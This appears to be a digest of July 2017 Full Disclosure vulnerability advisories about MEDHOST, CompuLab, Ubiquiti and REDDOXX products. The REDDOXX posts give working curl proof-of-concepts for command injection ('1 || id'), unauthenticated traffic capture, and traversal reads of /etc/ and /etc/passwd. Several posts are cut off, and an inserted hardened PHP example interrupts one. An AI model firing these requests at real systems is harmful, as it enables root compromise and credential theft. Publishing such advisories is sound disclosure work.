[FD] MEDHOST Connex contains hard-coded database credentials
Overview

MEDHOST Connex for all versions contains hard-coded credentials that are used for customer database access. This is a new vulnerability not related to CVE-2016-4328.

Description

MEDHOST Connex contains hard-coded credentials that are used for customer database access. An attacker with knowledge of the hard-coded credentials and the ability to communicate directly with the database may be able to obtain or modify sensitive patient and financial information.

Connex utilizes an IBM i DB2 user account for database access. The account name is HMSCXPDN. This password is hard-coded in multiple places of the application. Customers do not have the option to change this password. The account has elevated DB2 roles, and can access all objects or database tables on the customer DB2 database. This account can access data through ODBC, FTP, and Telnet. Customers w/o Connex installed are still vulnerable. The MEDHOST setup program creates this account.

Connex provides connectivity to exchange clinical information with the MEDHOST application. /1

Impact

An attacker with knowledge of the hard-coded credentials and the ability to communicate directly with the application database server may be able to obtain or modify patient and financial information.

Solution

The vendor has not issued a patch and has been unresponsive to this information after 3 attempts to communicate.

Restrict network access

As a general security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from using the hard-coded database credentials from a blocked network location.

References

/1 http://www.clinical-innovation.com/topics/health-it/himss-hms-launches-hms-connex-showcase-ambulatory-ehr

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Faraday v2.6: Collaborative Penetration Test and Vulnerability Management Platform
Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that helps users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

Check out the Faraday project in Github. https://github.com/infobyte/faraday

In the last couple of versions we added several features to allow our users to manage more and more parts of their engagements directly from our platform, so we realized, why not also add the option to manage methodologies and tasks? And so we did!

* Kanban Tasks View: Now you can create your custom methodologies, add tasks, tag them and keep track of your whole project directly from Faraday.

* Improving the Data Analysis tools: As per your requests, we made some changes to the existing Data Analysis tools introduced in the last release. We added the possibility to change data configuration in order to customize charts, a new bar chart type to show most vulnerable services and a filter for undefined or null values.

* Executive Report clean up: Some users reported issues with the sorting of Hosts and Evidence in the reports. We fixed it so the hosts in grouped reports are sorted by IP and evidence is sorted alphabetically by name. We know sometimes it is necessary to use special characters for evidence names. Some of our users

* Web UI: Now you can manually create the same vulnerability in several hosts at once! Select as many targets as you want when creating your vulns.

- Add vuln to multiple targets at once

Also, we made the vulnerability creation modal more consistent with the rest of the views by starting the pagination of the targets in page 1 instead of 0.

Changes:

- Improved Data analysis charts. Added more chart properties and data binding
- Improved target ordering in grouped reports
- Fixed bug with new line character in reports DOCX
- Adds alphabetical sort for Evidence in the Executive Report
- Fix bug updating users with no roles
- Fixed report creation with evidence names containing special chars
- Added Tasks Management to the Web UI
- Added the ability to select more than one target when creating a vuln in the Web UI
- Merged PR #182 - problems with zonatransfer.me
- Fixed bug in Download CSV of Status report with old versions of Firefox
- Fixed formula injection vulnerability in export to CSV feature
- Fixed DOM-based XSS in the Top Services widget of the dashboard
- Fix in AppScan plugin
- Fix HTML injection in Vulnerability template
- Add new plugin: Junit XML
- Improved pagination in new vuln modal of status report
- Added "Policy Violations" field for Vulnerabilities

We hope you enjoy it, and let us know if you have any questions or comments.

Come to #BHUSA - Mandalay Bay - Business Hall (July 26th - 27th)
We will be at booth IC43
https://www.blackhat.com/us-17/event-sponsors.html#faraday

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/
https://www.faradaysec.com/ideas
[FD] CVE-2017-9457 CompuLab Intense PC lacks firmware signature validation
Credits: Hal Martin
Website: watchmysys.com
Source: https://watchmysys.com/blog/2017/07/cve-2017-9457-compulab-intense-pc-lacks-firmware-validation/
Vendor: CompuLab (compulab.com)
Product: Intense PC / MintBox 2
Vulnerability type: Platform lacks signature verification and does not validate firmware update before flashing
CVE Reference: CVE-2017-9457

Summary:

Since 2013 CompuLab manufactures and sells the Intense PC (also sold under the name "MintBox 2"), which is a small Intel-based fanless PC sold to end-users and industrial customers. It was discovered that there is no signature validation of the UEFI firmware update file before flashing, allowing an attacker to silently flash a modified UEFI firmware using the standard Phoenix update utility.

CompuLab have indicated via email that capsule signature validation is disabled by default by the IBV (Phoenix) for this platform. No timeline was provided to implement capsule signature verification.

Affected versions:

All firmware versions since product release (latest public firmware is 21 May 2017)

Attack Vector:

An attacker tricks the user into running a malicious executable with local administrator privileges, which updates the system firmware to include the attacker's code. The attacker may instead use a known OS exploit to perform the upgrade remotely (without user interaction or notification).

Proof of concept:

I have created a modified firmware update which replaces the stock UEFI shell with the UEFI shell from EDK2. The update can be flashed from within Windows without any user interaction or notification. Firmware updates are not signed by CompuLab or verified by the existing firmware before upgrade.

The modified update, based on the 21 May 2017 firmware, can be downloaded here:
https://watchmysys.com/blog/wp-content/uploads/2017/07/update-IPC-20170521-edk2.zip

Details of the full proof of concept can be found at the Source link above.

Mitigation:

At this time there is no means for the end user to enable Capsule Signature verification or to prevent the Phoenix update utility from updating the system firmware. Therefore Intense PC owners should consider the following options:

- Ensure your operating system is up to date with the latest security patches. Do not run software from untrusted sources.
- Do not connect your Intense PC to any networks with internet access (i.e. air-gap the computer).
- Discontinue your use of the Intense PC and consider replacing the computer with one from a different manufacturer who implements signature validation for firmware updates.

Disclosure timeline:

6 June 2017: Issue reported to CompuLab
6 June 2017: CompuLab confirms that “Default settings of this source tree [Phoenix SecureCore Tiano Enhanced Intel Ivy Bridge CPU Panther Point M] has disabled Capsule Signature option.”
6 June 2017: Issue is reported to MITRE
6 June 2017: Vulnerability is assigned CVE-2017-9457
7 June 2017: CompuLab are informed that the vulnerability has been assigned CVE-2017-9457 and details of the vulnerability will be published after 45 days
22 July 2017: Details of the vulnerability are published
[FD] SEC Consult SA-20170724-1 :: Open Redirect issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-1 >
=======================================================================
              title: Open Redirect in Login Page
            product: Multiple Ubiquiti Networks products, e.g.
                     TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16, AG-HP-2G20,
                     AG-HP-5G23, AG-HP-5G27, AirGrid M, AirGrid M2, AirGrid M5,
                     AR, AR-HP, BM2HP, BM2-Ti, BM5HP, BM5-Ti, LiteStation M5,
                     locoM2, locoM5, locoM9, M2, M3, M365, M5, M900, NB-2G18,
                     NB-5G22, NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
                     NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP, Power AP N
 vulnerable version: AirOS 6.0.1 (XM), 1.3.4 (SW)
      fixed version: AirOS 6.0.3 (XM), 1.3.5 (SW)
         CVE number:
             impact: Low
           homepage: https://www.ubnt.com/
              found: 2017-03-22
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets."

Source: http://ir.ubnt.com/

Business recommendation:
------------------------
SEC Consult recommends not to use the devices in production until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) Open Redirect in Login Page - HackerOne #158287
An open redirect vulnerability can be triggered by luring an attacked user to authenticate to a Ubiquiti AirOS device by clicking on a crafted link. This vulnerability was found earlier by another bug bounty participant on HackerOne. It was numbered with #158287.

Proof of concept:
-----------------
http:///login.cgi?uri=https://www.sec-consult.com

After a successful login, the user will be redirected to https://www.sec-consult.com.
Vulnerable / tested versions:
-----------------------------
Ubiquiti Networks AirRouter (v6.0.1)
Ubiquiti Networks TS-8-PRO (v1.3.4)

Based on information embedded in the firmware of other Ubiquiti products gathered from our IoT Inspector tool we believe the following devices are affected as well:
Ubiquiti Networks LBE-M5-23 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M2-13 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-16 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-19 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M2-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-620 (Version: XW v6.0.1)
Ubiquiti Networks RM2-Ti (Version: XW v6.0.1)
Ubiquiti Networks RM5-Ti (Version: XW v6.0.1)

Vendor contact timeline:
------------------------
2017-03-22: Contacting vendor via HackerOne.
2017-03-22: Vendor marked open redirect as duplicate to: #158287
            The contact also states that this issue will be resolved in the next release.
2017-05-05: Found updates (6.0.3 and 1.3.5) on the website of the vendor and confirmed the fix - provide at least 90 days for customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date to 2017-07-24.
2017-07-24: Public release of security advisory

Solution:
---------
Upgrade to firmware version 6.0.3 (XM), 1.3.5 (SW) or later.

Workaround:
-----------
No workaround

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of
[FD] SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-0 >
=======================================================================
              title: Cross-Site Scripting (XSS)
            product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP
 vulnerable version: Firmware v1.9.1
      fixed version: Firmware v1.9.1.1
         CVE number:
             impact: Medium
           homepage: https://www.ubnt.com
              found: 2017-04-04
                 by: R. Freingruber, T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets."

Source: http://ir.ubnt.com/

Business recommendation:
------------------------
SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
This vulnerability can be exploited by deactivating or bypassing the integrated XSS-filter of the Internet Explorer. A reflected cross site scripting vulnerability was identified because of an initialization error in "/files/index/". An attacker can exploit this vulnerability by tricking a victim into visiting a malicious website. The attacker is able to hijack the session of the attacked user. If the user is currently not logged in, the injected JavaScript code can start a bruteforce attack (for example, with the default credentials ubnt:ubnt). After a session has been established, the code has full control over the system via the CLI feature which is basically a shell wrapper. By abusing this vulnerability an attacker can open ports on the router or start a reverse shell.

Proof of concept:
-----------------
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
The following URL can be used as PoC:
https://192.168.1.1/files/index/0/aaa
[FD] [RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance
Advisory: Remote Command Execution as root in REDDOXX Appliance

RedTeam Pentesting discovered a remote command execution vulnerability in the REDDOXX appliance software, which allows attackers to execute arbitrary commands with root privileges while unauthenticated.

Details
=======

Product: REDDOXX Appliance
Affected Versions: <= Build 2032 / v2.0.625
Fixed Versions: Version 2032 SP2
Vulnerability Type: Remote Command Execution
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-009
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement."
(from the vendor's homepage)

More Details
============

The administrative interface of the REDDOXX appliance [0] offers several diagnostic tools in the "Diagnostic Center". Ping is one of these tools. The interface for this tool contains two input fields, which allow users to specify a target host and a packet count. Through the ISO provided on the vendor's homepage [1], it was possible to analyze how these commands are embedded into the command-line of the ping command:

    function ExecuteDiag($parameter)
    {
        // Here we do the main thing ...
        // targetHost is wrapped in single quotes, count is concatenated bare
        $cmd = "ping '" . $parameter->targetHost . "' -c " . $parameter->count;

        $this->PrintHeader();
        $this->PrintHeadLine(array('Result Message', 'Status'));
        $this->PrintOut("");
        $this->PrintOut("");
        passthru($cmd, $rc);
        $this->PrintOut("");
        $this->PrintStatus($rc);
        $this->PrintOut("");
        $this->PrintEnd();

        $result = new stdClass;
        $result->ResultCode = $rc;
        $result->MessageText = "";
        $this->SaveResult($result);
    }

As can be seen in the listing above, the parameters are embedded into a string stored in the variable $cmd. The target host parameter is surrounded with single quotes, while the count parameter is not. Before the parameters are actually embedded into the ping command-line however, the following function performs a check for "illegal characters":

    public static function CheckShellParameter($parameter, $key = "")
    {
        if (!is_array($parameter))
            $parameter = array($parameter);

        foreach ($parameter as $value) {
            // deny-list: only ' ; < > and " are rejected
            if (preg_match("/[';<>\"]/", $value)) {
                $paramNameMsg = "";
                if ($key)
                    $paramNameMsg = " in parameter '$key'";
                throw new Exception("Invalid value" . $paramNameMsg . ". Illegal characters found.", 1);
            }
        }
    }

These are characters, which can be used to append additional commands to the command line. While this check prevents certain kinds of attacks, it is incomplete and can therefore be bypassed. For example, && (AND) and || (OR) operators can still be used to append additional commands to the command-line. Submitting a target host of "127.0.0.1" and a count of "1 || id" leads to the following command-line being passed to the PHP passthru() function and executed:

    ping '127.0.0.1' -c 1 || id

This causes the command "id" to be executed after the execution of the ping command is completed.

Proof of Concept
================

The following curl command-lines can be used to trigger the vulnerability. First, the diagnose function ping is called as follows:

    $ curl -H 'Content-Type: application/json' --data '{"Name":"Ping",'\
    '"Parameter":{"targetHost":"127.0.0.1","count":"1'\
    '&& echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'"}}' \
    http://www.example.com/api/v1/rws/diagnose/start

Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are only used to distinguish the output of the "id" command in the final result, which can be retrieved and displayed using the following curl command-line:
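An added example, not code from the advisory or from REDDOXX: an allow-list replacement for the CheckShellParameter()/ExecuteDiag() pattern quoted above. Instead of rejecting a handful of characters, it validates targetHost as an IP address or hostname and count as a small bounded integer, and still passes the host through escapeshellarg() before it reaches the shell. Function and class names are the example's own.

```php
<?php
// Hardened replacement for the deny-list check quoted in the advisory.
// Rationale: the original filter only rejected [';<>"], so a count of
// "1 || id" passed straight into the command line. An allow-list describes
// what the value must look like, so anything else is rejected regardless
// of which shell operator it contains.
declare(strict_types=1);

final class DiagInputError extends InvalidArgumentException {}

// Accept an IPv4/IPv6 address or an RFC 1123 style hostname, nothing else.
function validateTargetHost(string $host): string
{
    $host = trim($host);
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    // Hostname labels: letters, digits, inner hyphens; 1-63 chars each, 253 total.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (strlen($host) <= 253 && preg_match("/^$label(?:\\.$label)*\\.?$/", $host)) {
        return $host;
    }
    throw new DiagInputError("Invalid value in parameter 'targetHost'.");
}

// Accept only a positive integer within a sane bound for a diagnostic ping.
function validateCount(string $count): int
{
    $n = filter_var($count, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 20]]);
    if ($n === false) {
        throw new DiagInputError("Invalid value in parameter 'count'.");
    }
    return $n;
}

// Build the ping command line from validated input only. escapeshellarg()
// is applied to the host even after validation (defence in depth); the
// count is an int, so nothing but digits can be concatenated.
function buildPingCommand(array $parameter): string
{
    $host  = validateTargetHost((string)($parameter['targetHost'] ?? ''));
    $count = validateCount((string)($parameter['count'] ?? ''));
    return 'ping -c ' . $count . ' ' . escapeshellarg($host);
}

// Constructed inputs: a valid request and the bypass string from the advisory.
$cases = [
    ['targetHost' => '127.0.0.1', 'count' => '1'],        // accepted
    ['targetHost' => '127.0.0.1', 'count' => '1 || id'],  // rejected: not an integer
    ['targetHost' => 'host.example.', 'count' => '100'],  // rejected: count out of range
];
foreach ($cases as $case) {
    try {
        echo buildPingCommand($case), "\n";
    } catch (DiagInputError $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Where the PHP version allows it, passing the arguments as an array to proc_open() avoids the shell entirely and removes the need to build a command string at all.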
[FD] [RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance
Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

RedTeam Pentesting discovered a vulnerability which allows attackers unauthenticated access to the diagnostic functions of the administrative interface of the REDDOXX appliance. The functions allow, for example, to capture network traffic on the appliance's interfaces.

Details
=======

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement."
(from the vendor's homepage)

More Details
============

The administrative interface of the REDDOXX appliance [0] offers several diagnostic tools in the "Diagnostic Center". Tcpdump is one of these tools. This tool can be used to capture network traffic on local interfaces. During a penetration test, it was discovered that this function, as well as the other diagnostic functions, does not require authentication.

Proof of Concept
================

The following curl command-line can be used to start the capture process:

    $ curl --include --silent -H 'Content-Type: application/json' \
      --data-binary '{"Name":"Tcpdump","Parameter":{"host":"","port":""}}' \
      http://www.example.com/api/v1/rws/diagnose/start
    HTTP/1.1 200 OK
    Date: Thu, 18 May 2017 14:58:22 GMT
    Server: Apache/2.4.7 (Ubuntu)
    X-Powered-By: PHP/5.5.9-1ubuntu4.14
    [...]
    Content-Length: 0
    Content-Type: application/xml

The following curl command-line stops the capture process:

    $ curl --include --silent -H 'Content-Type: application/json' \
      --data-binary '{"Name":"Tcpdump"}' \
      http://www.example.com/api/v1/rws/diagnose/stop
    HTTP/1.1 200 OK
    Date: Thu, 18 May 2017 15:00:17 GMT
    Server: Apache/2.4.7 (Ubuntu)
    X-Powered-By: PHP/5.5.9-1ubuntu4.14
    [...]
    Content-Length: 0
    Content-Type: application/xml

After the capture process is complete, the resulting capture file can be downloaded without authentication:

    $ wget http://www.example.com/rws/resources/diagnosemanager/tcpdump.cap
    [...]
    Connecting to www.example.com:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1801530 (1.7M) [application/vnd.tcpdump.pcap]
    Saving to: ‘tcpdump.cap’

    tcpdump.cap    100%[===>]   1.72M  [...]

    2017-05-18 17:01:36 (34.1 MB/s) - ‘tcpdump.cap’ saved [1801530/1801530]

None of these requests contain any credentials or cookies, which could provide authentication.

Workaround
==========

None

Fix
===

Update the appliance software to Version 2032 SP2.

Security Risk
=============

The diagnostic functions of the REDDOXX appliance can be used without authentication. This allows attackers to, for example, capture network traffic. During a penetration test it was possible to capture multiple emails and also POP3 login attempts with cleartext credentials. This is rated as a high risk.

Timeline
========

2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released

References
==========

[0] https://www.reddoxx.com/en/

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
[FD] [RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance
Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance

RedTeam Pentesting discovered an arbitrary file disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to list directory contents and download arbitrary files from the affected system with root permissions.

Details
=======

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Arbitrary File Disclosure
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-006
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement."
(from the vendor's homepage)

More Details
============

When using the user frontend of the REDDOXX appliance [0] reachable via http://www.example.com/rws/user/, HTTP POST requests are used to perform certain actions. For example, the following request is used to save the settings of the current user's profile:

    POST /RdxEngine/json HTTP/1.1
    Host: www.example.com
    [...]
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 210
    Connection: close

    {
      "method": "CoreService.SaveUserProfile",
      "params": {
        "Profile": {
          "UseHtmlMail": true,
          "DefaultArchiveDisplayPeriode": "5",
          "ReportLanguage": "en",
          "EnableQueueReport": true
        }
      },
      "id": "{----}"
    }

Through analysis of the .NET binaries pertaining to this endpoint, extracted from the appliance ISO offered on the vendor's homepage [1], the methods handling these requests were examined. For the "SaveUserProfile" method, which is specified through the POST parameter "method", the code is as follows:

    // Reddoxx.Api.Legacy.CoreServiceService
    public void SaveUserProfile(TRoUserProfile Profile)
    {
        try
        {
            this.client.OnStartRequest("CoreService", "SaveUserProfile");
            this.Service.SaveUserProfile(Profile);
            this.client.OnEndRequest("CoreService", "SaveUserProfile");
        }
        catch (System.Exception e)
        {
            this.client.HandleException("CoreService", "SaveUserProfile", e);
        }
    }

The "TRoUserProfile" class contains information about the parameters that are required for valid requests to this method:

    namespace Reddoxx.Api.Legacy
    {
        [...]
        public class TRoUserProfile : ComplexType
        {
            private string __ReportLanguage;
            private int __DefaultArchiveDisplayPeriode;
            private bool __EnableQueueReport;
            private bool __UseHtmlMail;
            [...]
        }
    }

These variable names correspond to the POST parameters contained in the request that was created when the profile was saved. With this knowledge about how methods are called and parameters are passed, it was attempted to call other methods from different packages. It was determined that it is possible to access certain methods which allow reading arbitrary files and directory listings. It was later discovered that the process handling requests to the vulnerable methods runs with root privileges.

Proof of Concept
================

At least two methods are found to be of interest for attackers: FileTransfer.GetDirectoryList, which returns a directory listing for a path specified via a parameter, and FileTransfer.DownloadFile, which returns the file specified via a parameter in Base64-encoded form. The following curl command-lines can be used to call the respective methods:

    $ curl --silent --data-binary '{"id":"{----}",'\
    '"method":"FileTransfer.GetDirectoryList","params":{"Directory": "/etc/"}}' \
    'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName'
    "chatscripts"
    "gtk-2.0"
    "xen"
    "dbus-1"
    "request-key.d"
    "smartmontools"
    "console"
    "skel"
[FD] [RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance
Advisory: Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance RedTeam Pentesting discovered an arbitrary file disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to download arbitrary files from the affected system. Details === Product: REDDOXX Appliance Affected Versions: Build 2032 / v2.0.625, older versions likely affected too Fixed Versions: Version 2032 SP2 Vulnerability Type: Arbitrary File Disclosure Security Risk: high Vendor URL: https://www.reddoxx.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-004 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients’ requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement." (from the vendor's homepage) More Details The REDDOXX appliance [0] contains a PHP script called download.php. It is available at http://www.example.com/download.php in normal installations and resides at /opt/reddoxx/local/htdocs/download.php in the local filesystem of the appliance. Through the ISO provided on the vendor's homepage [1], it was possible to analyze this file and any other file in a typical REDDOXX appliance installation. 
The file contains the following source code (shortened to relevant sections): '') { $file = $fileName; $fileID = basename($fileName); } // Currently we only allow downloads from session directories if ((strpos($file, '/opt/reddoxx/wi/Sessions/') === false) && (strpos($file, '/opt/reddoxx/data/temp/Sessions/') === false)) { die('File is not in session directory: ' . $file); } if(!file_exists($file)) { [...] } else { // Set headers header('Pragma: public'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Cache-Control: private' ,false); header('Content-Description: File Transfer'); header('Content-Disposition: attachment; filename="' . $fileID. '"'); header('Content-Type: application/octet-stream'); header('Content-Transfer-Encoding: binary'); header('Content-Length: ' . filesize($file)); // Read the file from disk readfile($file); } ?> The script expects a URL parameter called "file" and stores its value in the variable $fileName. The value of this variable is then copied to the variable $file, which undergoes two different checks: First, the function strpos() is used to check whether a certain substring is contained in the value of the variable. The second check used the function file_exists() to determine whether the file specified in the variable is present in the filesystem. In order to circumvent the first check, a path such as /opt/reddoxx/data/temp/Sessions/../../../../../etc/passwd can be specified, as there are no protections against directory traversal in place. This path also passes the second check imposed by the function file_exists(). Having bypassed both checks, attackers are now able to reach the readfile() function and download arbitrary files. Since no authentication checks are in place, the disclosure of arbitrary files if also possible for unauthenticated attackers. The same functionality is vulnerable to a cross-site scripting vulnerability as described in rt-sa-2017-003 [2]. 
Proof of Concept
================

The following curl command-line can be used to trigger the vulnerability:

    $ curl --silent 'http://www.example.com/download.php?file='\
    '/opt/reddoxx/data/temp/Sessions/../../../../../etc/passwd'
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
[FD] [RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance
Advisory: Cross-Site Scripting in REDDOXX Appliance

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the REDDOXX appliance software, which allows attackers to inject arbitrary JavaScript code via a crafted URL.

Details
=======

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-003
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"REDDOXX is a leading supplier of solutions for e-mail archiving, encrypted and digitally signed e-mail traffic as well as spam protection. Our focus is on technological innovation: taking our cue from our clients' requirements our competent and quality-conscious employees strive to offer you the best possible products at all times. Using stringent quality standards and proven processes we keep developing our company and products continuously, with the goal of continuous improvement."
(from the vendor's homepage)

More Details
============

The REDDOXX appliance [0] contains a PHP script called download.php. It is available at http://www.example.com/download.php in normal installations and resides at /opt/reddoxx/local/htdocs/download.php on the local filesystem of the appliance. Through the ISO provided on the vendor's homepage [1], it was possible to analyze this file and any other file in a typical REDDOXX appliance installation.
The file contains the following source code (shortened to the relevant sections):

    [...]
    '') {
        $file = $fileName;
        $fileID = basename($fileName);
    }

